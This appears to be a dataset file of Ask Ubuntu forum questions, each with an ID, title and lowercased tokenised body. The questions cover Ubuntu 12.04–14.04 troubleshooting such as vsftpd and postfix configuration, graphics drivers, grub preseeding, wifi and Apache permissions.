457248	vsftpd not working	i followed instructions and other other instructions too but because it is not user-friendly , the ftp server is not working . # this option specifies the location of the rsa key to use for ssl # encrypted connections . rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key pasv_enable=yes pasv_addr_resolve=yes # user ddns address pasv_address=54 ... . ( my ip ) # choose and range you like pasv_min_port=1024 pasv_max_port=1048 then : ~ $ sudo service vsftpd status vsftpd stop/waiting ubuntu @ ip : ~ $ sudo service vsftpd restart stop : unknown instance : vsftpd start/pre-start , process 9711 but it can not connect with an ftp client . i opened the ports in security group and reinstalled everything , still not working . what can be done ? what ca n't it work per default ? i try to connect with a user account that i added with useradd . $ sudo vsftpd 500 oops : munmap $ service vsftpd begin rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service vsftpd begin the script you are attempting to invoke has been converted to an upstart job , but begin is not supported for upstart jobs .
457251	ubuntu 14.04 and intel graphics ( q33/gma )	i have just installed 14.04 but i ca n't get the graphics work . the intel driver seems to be installed , though i work only in 1024x768 and 800x600 . my graphics card is intel q33 . any help plz ?
457252	intel_powerclamp : start/stop forced idle injection	i do not really knows when it started , i just upgraded from 13.10 to 14.04 and was about to do something about graphics performances ( unity felt sluggish ) . that situation already lasted for 6 months i was paying attention to troubled nvidia proprietary drivers in sli configuration ... i was seriously pissed off on nvidia , unity and i was about to go for something non-unity related just go get smooth environment ... then i discovered less then hour before i killed ubuntu/unity ... it is something related to intel_pstate ... i simply noticed , upon login performances are fantastics ... both cpu and gpu ... like a dream ... then after cca 10 seconds they drop and situation becomes ugly ... i chased trough logs and found in syslog it seems to be related to this line : apr 28 21:29:41 b4da55 kernel : [ 83.861621 ] intel_powerclamp : start idle injection to reduce power after this line performances are gone . the session i 'm having this one while writing this post is somewhat different ... i was looking at google to find how to tune or disable this idle injection ( at least while i work on ac , not batteries ) to get max performances but nothing ... then it happened on it 's own , this line pop-up in syslog : apr 28 21:46:03 b4da55 kernel : [ 362.386585 ] intel_powerclamp : stop forced idle injection i do not know what caused it ... but now it works like a charm ! it 's so smooth ... i ca n't believe ... i guess it renders like over 100fps ... i enabled wobbling window effect and having fun ... htop is showing much lower cpu usage while i 'm not doing anything ... can someone tell me how i can control this idle injection ?
457253	vpnc client for checkpoint	the following link described the vpnc client for cisco https : //help.ubuntu.com/community/vpnclient is this vpnc can fit also for checkpoint ? if yes please advice how we can configure this vpnc for checkpoint ? from the link details , we can see that the configuration file is .pcf file ( cisco ) but for checkpoint is different â user.c file so i guess that this vpnc cant support checkpoint but i am not sure ? please advice if there are some other alternatives for vpnc for checkpoint
457254	rhythmbox required plugin could not be found	ubuntu 12.04 contains rhythmbox and a video player . these tend to give me an error when i try to play , say , an .mp3 file . required plugin not found : python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder apparently , this is one way of solving the problem , but it seems a little long winded . is it better to just install a new ( and `` complete '' ) copy of rhythmbox ? i know that other oss like zorin has no issues with playing media files . ( alternatively , vlc player might be better but i do n't have a good internet connection on my linux computer at the moment . )
457256	preseed value for installing grub on ubuntu 14.04 unattended	i 'm running into issues installing grub using the preseed on an unattended installation . this has worked for us on 12.04 and 13.10 though . we currently have the two lines in the preseed file in regards to grub : d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true the problem is , while watching the failed installs through the serial console , we are hitting a section in the grub installation portion that shows : ┌──────────┤ [ ! ! ] install the grub boot loader on a hard disk ├───────────┐ │ │ │ you need to make the newly installed system bootable , by installing │ │ the grub boot loader on a bootable device . the usual way to do this │ │ is to install grub on the master boot record of your first hard │ │ drive . if you prefer , you can install grub elsewhere on the drive , or │ │ to another drive , or even to a floppy . │ │ │ │ the device should be specified as a device in /dev . below are some │ │ examples : │ │ - `` /dev/sda '' will install grub to the master boot record of your │ │ first │ │ hard drive ; │ │ - `` /dev/sda2 '' will use the second partition of your first hard │ │ drive ; │ │ │ │ _____________________________________________________________________ │ │ │ │ < go back > < continue > │ │ │ └─────────────────────────────────────────────────────────────────────────┘ notice that this screen came up and that it does n't even have a device path specified yet . in our case we can type in /dev/sda and it will work . if we do n't type it in and just hit continue , the installation will proceed just fine , but after the reboot it does not have the correct grub2 bootloader installed . i tried doing d-i grub-installer/bootdev string ( hd0,0 ) with no luck already . so , any idea what we should put into the preseed to tell it to install grub on the first mbr ?
457257	using cuda with nvidia optimus in intel mode ( 14.04 )	i 'm using a thinkpad t430 with a nvs 5400m and an integrated intel hd card . since it 's not possible to use cuda-gdb when the nvidia card is used for video output , i tried to use cuda while in intel mode . but unfortunately i get the following error message : no cuda-capable device is detected in ... using google i found an old guide for using nvidia cuda with optimus cards . but when i try to load the driver manually i just get another error message : modprobe : error : could not insert 'nvidia_331 ' : no such device is there a way to use cuda and thus the cuda-gdb while in intel mode ? fyi : everything but the cuda-gdb works fine when i 'm on nvidia mode .
457259	ntldr is missing	i 'm new with ubuntu . i have formatted my hdd and tried to install ubuntu from a dvd , but i only get the above mentioned message . any suggestions ?
457261	login start problem	after years of no problems with my ubuntu 12.04 , today my laptop began experiencing the following problem . when i get to the login screen , it apparently freezes . regardless , i type my password and hit enter . nothing happens . i wait like a minute or a minute and a half and suddenly the password shows in the box ( i mean , the dots representing the password ) and the machine resumes the login process and operates normally . how do i troubleshoot this problem ? your help is appreciated . here 's some info about my machine : williepabon @ williepabon-vgn-n130g : ~ $ uname -a linux williepabon-vgn-n130g 3.2.0-61-generic-pae # 92-ubuntu smp tue apr 1 00:10:04 utc 2014 i686 i686 i386 gnu/linux williepabon @ williepabon-vgn-n130g : ~ $ lsb_release -a lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core-3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise williepabon @ williepabon-vgn-n130g : ~ $ grub-install -v grub-install ( grub ) 1.99-21ubuntu3.14
457262	keyboard is not configured properly	i have a problem with my usb keyboard not being correctly configured in ubuntu 14.10. lsusb shows the device as bus 005 device 010 : id 0db5:0119 dmesg | tail gives the following : [ 726.852025 ] usb 5-2 : new full-speed usb device number 3 using uhci_hcd [ 727.026810 ] usb 5-2 : new usb device found , idvendor=0db5 , idproduct=0119 [ 727.026815 ] usb 5-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 727.026819 ] usb 5-2 : product : multifunction keyboard hub [ 727.026822 ] usb 5-2 : manufacturer : access keyboards ltd. [ 727.034838 ] hub 5-2:1.0 : usb hub found [ 727.035809 ] hub 5-2:1.0 : config failed , hub has too many ports ! ( err -19 ) the keyboard has indeed a hub with two ( 2 ) ports integrated , but after looking that should be handled by linux since this error is meant to pop up only if device has more than fifteen ( 15 ) ports . keyboard works fine in windows 7 . i did some research as well and can tell this is not related to a compatibility mode in my bios or similar . udev does not seem to be able to help there either . i am new to this , should i consider filling a bug report in launchpad ? anything else i could do ?
457263	ubuntu 14.04 unity launcher crash after click second open window	when there are more than one window opened from the same program , let 's say gedit and you click on the application launcher expecting a kind of previsualizators to choose one of the opened windows , x system keeps blocked and i need to open a shell session and kill it . is this happening to anyone else ? regards , 路_-
457267	postfix relay access denied , noqueue : reject	in trying to set up postfix to use dovecot for sasl ( using mysql for virtual_* ) i am unable to send email , either through telnet or outlook , to a domain other than the one that is on the server . i am able to receive pop3 email just fine . for smtp , i am authenticating in outlook on port 25 , using tls . update ( probably important ) : i can not authenticate via telnet . when i try auth login i receive the error 503 5.5.1 error : authentication not enabled i get the error 554 5.7.1 relay access denied . i have included below the output of postconf -n , please let me know if you need additional information - any help is appreciated ! alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix inet_interfaces = all mailbox_size_limit = 0 mydestination = /etc/mailname myhostname = emaproduction.truckingshow.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = truckingshow.net readme_directory = no recipient_delimiter = + relayhost = smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_relay_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/certs/dovecot.pem smtpd_tls_key_file = /etc/ssl/private/dovecot.pem smtpd_use_tls = yes virtual_alias_maps = mysql : /etc/postfix/mysql-virtual-alias-maps.cf virtual_mailbox_domains = mysql : /etc/postfix/mysql-virtual-mailbox-domains.cf virtual_mailbox_maps = mysql : /etc/postfix/mysql-virtual-mailbox-maps.cf virtual_transport = lmtp : unix : private/dovecot-lmtp this is the output of doveconf -n : # 2.2.9 : /etc/dovecot/dovecot.conf # os : linux 3.13.7-x86_64-linode38 x86_64 ubuntu 14.04 lts ext3 auth_mechanisms = plain login auth_verbose = yes log_path = /var/log/dovecot.log mail_debug = yes mail_location = maildir : /var/mail/vhosts/ % d/ % n mail_privileged_group = mail namespace inbox { inbox = yes location = mailbox drafts { special_use = \drafts } mailbox junk { special_use = \junk } mailbox sent { special_use = \sent } mailbox `` sent messages '' { special_use = \sent } mailbox trash { special_use = \trash } prefix = } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } protocols = imap pop3 lmtp service auth-worker { user = vmail } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { mode = 0600 user = vmail } user = dovecot } service imap-login { inet_listener imap { port = 0 } } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = postfix mode = 0600 user = postfix } } service pop3-login { inet_listener pop3 { port = 0 } } ssl = required ssl_cert = < /etc/ssl/certs/dovecot.pem ssl_key = < /etc/ssl/private/dovecot.pem userdb { args = uid=vmail gid=vmail home=/var/mail/vhosts/ % d/ % n driver = static }
457269	wireless mouse problem	i have two computers in two rooms next to eachother , with two wireless mice that have their own recievers . the problem is that the reciever on my computer is picking up the wireless signal from the mouse on the other room , so it is also moving on my computer when it 's being used ~.~ on windows i was able to go to device manager and disable the second mouse from device manager . [ so it only picks up one mouse ] but i 'm not sure how i can do it on lubuntu . [ i use lubuntu 14.04 lts ] any idea ? ; /
457270	user login screen shows only gnome flashback option in ubuntu 14.04	hello i upgrade ubuntu 13.10 development branch and successfully installed ubuntu 14.04. but my problem is on user login screen.user login screen shows only gnome flashback option so how to get back ubuntu default . may be this is bug but how to get back ? thanks in advance
457273	14.04 stops booting mid-upstart - how to debug ?	my laptop is fully updated to the latest 14.04 packages , and all of a sudden it just stops coming up during boot : ( i 'm sure you can ignore the vg_sys-root at the top ) i booted into recovery , started services by hand so i could get into it then continued the boot sequence . i was then able to get enough things going to get my desktop up and get to work , but some things are n't working ( like network manager , etc ) . i 'm still trying to figure out how to debug upstart , but it seems to me that these signals are still waiting to get processed ? 3154 ? ss 0:00 /bin/sh -e /proc/self/fd/9 3157 ? s 0:00 \_ initctl emit startup 3160 ? ss 0:00 /bin/sh -e /proc/self/fd/9 3217 ? s 0:00 \_ initctl emit plymouth-ready i have a crypted disk , been using this setup for ages . /etc/crypttab : sda3_crypt uuid=8fc603a9-e199-427f-b079-f273c46856cb none luks any idea where to go from here or debug upstart and find out what it 's waiting for ?
457276	menu have icons in ubuntu tweak not working	when i entered ubuntu-tweak to tick `` menu have icons '' i found icons only on mouse right click menu except cut , copy , paste ... anyway all window menu , once selected , show no icon near the corresponding item in all programs i use ( e.g . nautilus , eclipse ... ) . i tried even with dconf-editor but it 's exactly the same .
457278	ubuntu 14.04 lts wifi issue	i have a qosmio x500-13r with ubuntu 14.04 lts in dual-boot . since i installed it i 've had an issue with the wi-fi speed . it connects just fine and has no problem accessing any website . the thing is the speed does n't go further than 300 kb/s although i have a 100 mbps connection . i did n't have this problem with ubuntu 13.10 . has anyone been able to find a solution ?
457280	kwin effects worked 100 % on kubuntu 12.04 but i cant get them all to work on 14.04	my vmware fusion 6.0.3 vm running kubuntu 12.04 lts worked great when using all kwin effects , but i had to use a workaround . i put this following workaround text at the end of the 12.04 /etc/profile file to make all effects work . kwin_compose=o2 kwin -- graphicssystem raster -- replace & '' . on 14.04 lts , i get a message that says 30 effects do not load after i put my work around in place and try every combination of xrender and opengl . is there a new workaround since my old one does n't work ? the opening new windows in the center of the pc screen kwin effect is working on 14.04 , so i guess some effects do work .
457282	why do ec2 instances provisioned with juju no longer include additional storage ?	i recently upgraded from juju 1.18 to 1.18.1 , and suddenly my charm to deploy a mapr hadoop cluster stopped working . i traced the problem to the fact that non-root disks are no longer associated with the instances , even though the constraints to the juju-deploy option have not changed . as far as i can tell , there is not yet a juju constraint that defines non-boot storage . the documentation for the root-disk constraint specifically notes `` additional storage that may be attached separately does not count towards this value . '' two questions : what changed ? the default m1.xlarge instances have 1 or 2 ephemeral disks when i create them within the basic ec2 commands ... but not when juju creates them what is the juju-supported mechanism for defining additional storage volumes .
457286	strange colors in ubuntu ( green tint , 14.04 lts )	i have a dell inspiron 17r 5737 with an intel haswell core i5 4200u , and an amd radeon hd8870 graphics card ( switchable ) . when installing ubuntu ( after checking disk for errors ) and choosing `` try without installing '' , there 's a green tint on the whole screen ( where it 's supposed to be pink/purple ) . i thought it might just be an issue that would n't show up after installing it onto the hard drive , and so i went on with the installation without any problems . my computer rebooted and i booted ubuntu for some tweaking . but the green tint was still there . i tried plugging in my lg hdtv via hdmi and on that screen there was no tint , but it was still there on my laptop . what i 'm wondering is why this happens and if there 's any way to fix it , because i would really like to be able to use ubuntu .
457292	there is a way to change google chrome icon on status bar ?	i 'm running google chrome on ubuntu 14.04 and i noticed that there is a google chrome icon on my status bar - i think is because of the background apps . there is a way to change the icon to monochrome ? if i could change the icon of the chrome notification would be great too .
457295	add all new users and guest user to a group dynamically on ubuntu 14.04	i would like to add all the users ( current , new , guest ) to a particular group , lets say `` audio '' dynamically . can you tell me how i can accomplish this ?
457300	dynamic internet ip ubuntu 12.04 desktop setup	installed dual boot with ubuntu 12.04 desktop and win xp . on xp can/have set up my internet access to be on demand - click desktop shortcut/enter un & pw/connects via router which is set to bridged mode . do not want a connection that is always on . the xp setup gives a different ip address each time it is connected . would like to do the same setup on ubuntu.plenty of advice on servers and connecting to lan networks but nothing on standalone desktop systems . would appreciate some advice on setup procedure .
457301	help loading ubuntu along side windows xp	i am a newbie . how do i get started ? i have windows xp , and would like to run ubuntu as well . i have downloaded ubuntu to a memory stick , to a dvd-rw , and to 'programs ' on 'my computer ' . it downloads to 'my computer ' as `` pagefiles.sys ' . when i try to open from any source , i get the message : this file does not have a program associated with it for performing this action . crate an association in folder options control panel . none of the options offered allow me to open ubuntu . how do i get it to operate as my operating system ? what do i do ? i do not understand many of the term i see used in the q & a sections .
457306	play window games on ubuntu	i have many windows games on my pc like doom , doom 2 , diablo , diablo 2 , diablo 3 , nfs games , left 4 dead games call of duty games , halo games and many many more games i have in my laptop . i just like to know if its possible to intall them and play them on ubuntu without using steam , im not a steam fan at all . because im a hard core gamer and i dont want to change from window 8.1 to ubuntu if all of my games are not compatible .
457307	restoring previous drivers after jockey 's nvidia drivers update	lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 network controller : intel corporation centrino wireless-n 1030 [ rainbow peak ] ( rev 34 ) 0b:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) after installing jockey 's recent releases of new nvidia drivers my resolution dropped to 640 x 480 and i ca n't change it . i did this , because i hadn ' wanted to have multicolored artifacts after waking up my system . i tried many askubuntu.com advices , recovery mode 's packages repairing , installed/removed many packages of drivers , bumblebee etc . and nothing works for me . i am total beginner as far as any drivers issues in ubuntu are concerned , so i would be grateful if anyone could help me ; i am able to share with you any needed logs . thank you in advance
457315	installing from minimal cd	i 'm a windows xp user and i 'm new to linux i decided to install xubuntu on my machine since it 's quite old ( 512 mb ram and 2.66 ghz p4 processor ) my machine does n't support booting from usb so the only choise for me was installing xubuntu from minimal cd the problem is that i 'm new to linux , the only os i 've ever used was windows so in the setup process every thing went fine until the partionning process i want to install xubuntu next to my xp and i got only tow partitions on my 160 gb hd so anyone who know how to partition my hd in a way that keeps my xp and my other files ? thanx in advance : - )
457317	mpeg2 transport stream ( mts ) thumbnails	i have one of these sony handycams that produce mts video files . openshot can now edit them and mplayer2 can play them , which is fantastic . but i have trouble knowing which is which in the file manager and shotwell - as all the thumbnails are green or grey . i have installed all the packages recommended in this post and i have followed the instructions to add a custom mts schema to the gnome config in this post , but still no result .
457320	dual booting starting without any os	i do n't have any os on my computer right now , but i have 2 500gb hard drives and would like to duel boot windows 7 . i would like to have about 250gb for windows and the other 750gb go to ubuntu . how do i go about doing this ?
457321	tuxguitar - no sound in 14.04	i tried the solutions in tuxguitar does n't play any sound but they did n't help . i do n't see timidity as an option of the midi port . i can play midi files through timidity . how can i debug this further ? thanks , andy
457323	easy way to install tex live ( and tex studio ) in ubuntu 12.04	i have recently switched to using linux ( ubuntu 12.04 ) and i need to install a latex distribution and editor . i 'm reasonably experienced with latex on win7 , so is there an easy way to get latex up and running ?
457329	shutting down all virtualbox ( vagrant ) vms in one easy to use bash command ( that can be put into a bash file )	i use vagrant for development . i forget to shut down a few of the vms . when i go to log out of my host machine , the ubuntu shutdown process appears to hang . might there be a way to script a close of all vagrant boxes with a bit of commandline-fu ? something like the following , but something that , well , works . for f in $ home/vagrant ; do ; cd $ f vagrant halt done ;
457330	updates for ubuntu lts desktop versus lts server	i still have ubuntu 10.04 lts desktop on my systems . 10.04 desktop has reached end of life . i understand that means there will be no more security updates for this product . is that correct ? ubuntu 10.04 lts server is still supported for another year . will the security updates for the server work for the desktop ? if i do an update from the 10.04 lts desktop , what gets updated ? any kernel updates ?
457336	bind keyboard alt+tab to logitech m705 extra button	title says it all . logitech does n't make software to do this on ubuntu , so what am i to do ? i 'm brand new to linux , so any response needs to be step-by-step . i run ubuntu 14.04 .
457338	numlock disables when switching keyboard distro with shortcut	i wanted to share with you a a particular issue that i 'm having . i use a keyboard shortcut to change my keyboard distro between english and spanish . the problem i found out is that , whenever i press this key combination , my numlock disables . however , if i disable this key combination to change keyboard distribution , the problem goes away . does anyone have the same problem , or at least can reproduce it ? thanks in advance ! marco
457340	making hidden menu items appear	i was looking through the menulibre documentation but i could not figure out how to make the hidden menu items appear by toggling fields in menulibre . i have a fresh install of xubuntu 14.04 . have looked in the gui and in the .desktop files and it 's not apparent where the toggle is . as an example below the software updater is hidden by default in xubuntu 14.04 . if i create a new menu item via menulibre gui with the exact same command the menu item appears just fine . the .desktop file looks basically exactly the same so i 'm not sure what the issue is . as it stands any menu item i want to make 'visible ' i have to manually create a new menu item for this . the hidden menu item .desktop file looks as follows : [ desktop entry ] version=1.0 type=application name=software updater genericname=software updates comment=show and install available updates icon=system-software-update exec=/usr/bin/update-manager nodisplay=false categories=settings ; system ; startupnotify=false terminal=false
457341	wifi drops and wo n't reconnect until reboot ( 14.04 with rtl8723be )	i have a new sager np2650 laptop with a fresh ubuntu 14.04lts install . it has a realtek rtl8723be wireless adapter in it . initially after installation i had no wireless , but i was able to get it working after following the instructions on this thread : http : //ubuntuforums.org/showthread.php ? t=2205497 . i had to checkout an earlier version of the driver from git as the thread says in order to get it to compile on my system . the problem is that the connection eventually is lost within an hour or so , although network manager still shows it as connected . if i disable and re-enable the wi-fi or networking it does n't work . the wifi just endlessly tries to connect , but fails . if i reboot it works fine again for a while . i ran the wireless diagnostic script found elsewhere on the forum and uploaded my results here : http : //pastebin.ubuntu.com/7355768/ i could use some help . thanks !
457342	linux software compatability	a. email client , such as outlook or thunderbird b. linux distribution . lubuntu is recommended . c. wireshark d. open source steganography tool , such as openstego e. hex workshop hex editor f. ftk imager g. vmware workstation h. openvpn vmware vm i need these programs for my school work , and am new to the linux scene . i have tried to google the stuff but cant fins versions compatible with ubuntu . all help is greatly appreciated .
457343	numeric keypad arrows should behave exactly like regular arrows	when the numeric keypad is off , the arrows on keys 2,4,6,8 need to behave just like the regular arrows . but they do not . example # 1 : run gedit , and put in a few words . using the regular arrows , use ctrl-shift-arrow to select entire words at one . now make sure num-lock is off , and try the same with the numeric keypad arrows . does n't do anything . example # 2 : install jedit , and try to navigate . the arrows do n't even work at all . example # 3 : install intellij idea , and try to navigate . the up and down arrows actually scroll the text , without changing the position of the cursor . there is a good principle when it comes to features , `` the principle of least astonishment '' . things should not be astonishingly different than expected . i 'd like a setting somewhere that would force the keyboard driver to consider the state of the num-lock key when an arrow key is pressed on the numeric keypad , and if it was set , emit the exact same scan code as the regular arrow key .
457345	black screen , ca n't log on	i downloaded and installed the latest version of ubuntu the other day . i rebooted after the install . got the four dots okay but then instead of getting the logon screen , the screen went black . i have to restart the computer . i can run : advanced options ubuntu , with linux 3.13.0-24-generic ( recovery mode ) or ubuntu , with linux 3.11.0-19-generic
457346	non bootable imac what ubuntu can i use to use as startup dvd	when i start my imac i get the apple logo and the swirling gear then it freezes in this position . i have tried command-r during startup -- -it ca n't find recovery partition press shift during startup - nothing happens press d during startup it can not find a `` bootable cache '' i have `` heard '' that ubuntu can be used to at least start the mac and maybe it will load programs from the mac to correct my startup problem i need to know which version of ubuntu i should use for a bootable dvd or usb stick and what kind of format does ubuntu have to be inâś . ie . iso , or what .
457351	are there softwares available on ubuntu for the conversion of a series of image files into an animated gif file ?	before you mention this question tool to convert a sequence of numbered png files to an animated gif ? i would like to say i 'm a total noob when it comes to ubuntu ( i know i have 1375 rep but i have since gone back to windows and have only just now returned and my memory is very fussy ) and imagemagick does n't seem to have a convert tool any more . i 'm used to using photoscape on windows and i rather like its set up so if anyone knows an alternative on ubuntu that 's similar that 'd be much appreciated .
457360	how to downgrade from 64-bit to 32-bit	i have a 2gb chromebook with 64-bit ubuntu 12.04 and it runs extremly slow and often crashes so how to i downgrade it to 32-bit or is their another solution ?
457366	nothing working . black screen problem . no boot . no proper installation . ubuntu 14.04	so i recently decided on installing ubuntu ( in need for a project in uni ) and installed 14.04 today next to my windows 8.1 installation . after some thinking and really liking what i saw i decided to exclusively use ubuntu 14.04 from now on . so i decided to back my windows stuff up and restarted in windows , backed everything , wanted to come back to 14.04 and boom , nothing works . i get the ( after some research ) obviously famous black screen problem . and yes in advance : i 've tried almost all of the solutions that were already posted online but nothing seems to work for me . btw : i am not completely new to linux & co , so not a complete noob at least . plus i study computer science and am really not just trying random things . the system : i7 2670qm , 8gb ram , geforce gt525m so what happened is that i thought to just re-install the whole system . so i booted from dvd again and installed 14.04 over everything . windows 8 included to only have 14.04 on my pc . the installation would n't start ( black screen ) , only in the `` escape '' mode with nomodeset . this would give me an installation that runs for only one time , the next restart causes the black screen without even getting to the log-in screen . i 've had several different occurences now : black screen with dvd boot black screen before log-in ubuntu screen with mouse after log in so quite everything that anyone has ever experienced ( as far as i 've read ) . when it ran , i was only able to chose 1024x760 resolution . the very first installation was standard 1600x1080 . right now i managed to burn a new boot-dvd and voila , the installation ( dvd boot ) starts and is in 1600x1080 . installing right now , but not having much hope for the operation . anyhow , i hope that you can give me some further insight on what is actually happening with my system and if i can get ubuntu running somehow in this lifetime . thanks in advance , cheers !
457367	ca n't get a drive to show up on server with apache2	i 'm running ubuntu 14.04 , i have apache2 and the entire lamp stack installed . everything is working correctly from that end . i have an internal , separate hdd i want the contents of available to the server . i tried to sym-link the directory into /var/www/html , chmod and chown 'd it by both my username and www-data -- i get a 403 forbidden when i try to access it from the web . i then tried to change the document root to point to the drive . i still get a 403 . chmod and chown 'd this both for me and www-data as well . still no dice . i have a suspicion that it has something to do with how it is mounted , perhaps ? i 'm symlinking/document rooting from media/ { username } / { drive uuid } and i also tried from /mnt/ { drive uuid } . the drive is mounted , but it 's auto-mounted and when i try to turn off auto and change anything , even just how it identifies ( from uuid to sdb1 ) , it throws an error when i mount . everything on the drive seems to work , though , so i do n't think it 's a bad drive . i have tried making sure follow symlinks is on , but all the websites out there tell me to change httpd.conf where all i have is sites-available , enabled , etc . i 'm not sure which file in which directory to change . i 've tried an alias and a in sites-enabled/000-default.conf and apache2.conf , restarted the server -- still does n't work . if you need to know the applicable section in apache2.conf : < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > # < directory /srv/ > # options indexes followsymlinks # allowoverride none # require all granted # < /directory > if i 'm reading that correctly , should n't symlinks already be enabled ? i 'm fairly new to linux and apache and all the rest , so step-by-steps would be most helpful .
457370	reinstalling grub - shows no volume groups found , how do you fix this ?	i have a full backup which i had restored onto a new built system on ubuntu 12.04 the backup did not include /dev /proc /sys folders . upon rebooting , the grub show the following errors error : no such device : 0f7dccc8-120f-41bd-ae68-3b5a3c35ecb7 error : file not found error : you need to load the kernel first using the ubuntu 12.04 server cd , boot and select the rescue mode . execute a shell in /dev/sda1 - which allows me to execute as on the system update /etc/fstab with new system uuid reinstall grub - which goes well until i do an update-grub found linux image : /boot/vmlinuz-3.2.0-29-generic-pae found initrd image : /boot/initrd.img-3.2.0-29-generic-pae found memtest86+ image : /boot/memtest86+.bin no volume groups found done how do we fix this no volume groups , i.e . create a volume group fdisk -l - shows there 3 partition . only /dev/sda2 is where the data is ? /dev/sda1 linux - /boot as well / directory is /dev/sda2 extended /dev/sda5 linux swap should i check for existing volume or partition and recreate .
457371	how to add an application icons to the desktop in 14.04 ?	how does one add an application icon to the desktop in verson 14.04 ? thank you for your time .
457372	changing `` front end '' on pgl	whenever i try to set my `` front end '' on pgl it accepts it but i still recieve the following error message : could not use either kdesu ( do ) or gksu ( do ) to execute the command requested . you can set the path of the one you prefer in `` options - settings - sudo front-end ''
457374	ubuntu 14.04 blank desktop	this is my first time with ubuntu ( or any linux distro for that matter ) . i installed ubuntu 14.04 alongside windows 7 . the initial install went flawlessly without any errors . after the install , i was able to login with the user i created , and then it booted up to a blank purplish screen . the only thing showing is my cursor . left or right clicking does n't bring up any options . i left it for an hour thinking it is still installing . still has the blank screen . i reloaded the dvd thinking i will get a 'repair ' option , but only get 'try ubuntu ' and 'install ubuntu ' . this is on a dell laptop . can anyone please give me a detailed step by step fix ? my first experience with ubuntu is n't going too well .
457378	duplicity errno 28 no space left on device	in addition to problems restoring files from deja-dup copies without nautilus , duplicity ca n't even say on which device it lacks space while trying to restore a big backup .
457389	how do i print the processes data from gnome-system-monitor ?	i would like to print a list of active processes . i have no idea how to do so . can you offer suggestions ? an alternative could be a routine that logs processes so i can print from the log file . i believe that something may be available of which i am unaware .
457391	`` radeon : ring 0 test failed '' on boot ubuntu 14.04	as the title says , booting will occasionally give me an error saying something along the lines of `` radeon : ring 0 test failed '' followed by `` radeon : disabling gpu acceleration '' and then freeze right there . i ca n't manually reproduce it , as it seems to happen randomly . when it does happen , i generally force it off by holding the power button , because the few times i 've tried to let it work itself out , it stayed there for a couple hours . sometimes it only happens once , other times it will continue saying the same thing for hours on end . once it stops happening , it will usually be fine for a couple of days , and then come back as soon as i start to forget about it . google has only turned up vague bug reports for other distributions that did n't even have a definitive answer . they repeatedly ended with the op saying `` nevermind . '' i 've been using ubuntu for years and never had this problem . it only showed up when i made the switch to 14.04 . also , i did n't use the upgrade button . it 's a clean install . i 'm running 64-bit on an hp probook 4530s with hybrid graphics . p.s . i know i said i 've been using it for years , but there is still a lot i do n't know . even if you think it should be obvious , stick to baby-steps , just in case it 's something i have n't run into before . my knowledge only goes as far as what i 've needed to fix in the past , which is n't much . thanks for your time .
457395	can not change `` sudo front header '' in peer guardian	i have been told this is not an issue with peer guardian . when setting up peer guardian i can not change my `` sudo front header . '' i recieve no error messages but when trying to edit settings after doing this i still recieve the message : could not use either kdesu ( do ) or gksu ( do ) to execute the command requested . you can set the path of the one you prefer in `` options - settings - sudo front-end . '' once again i have been told this is not a peer guardian issue but i can not assure that they are correct . please help me find an alternative of how to resolve the issue when changing the front header .
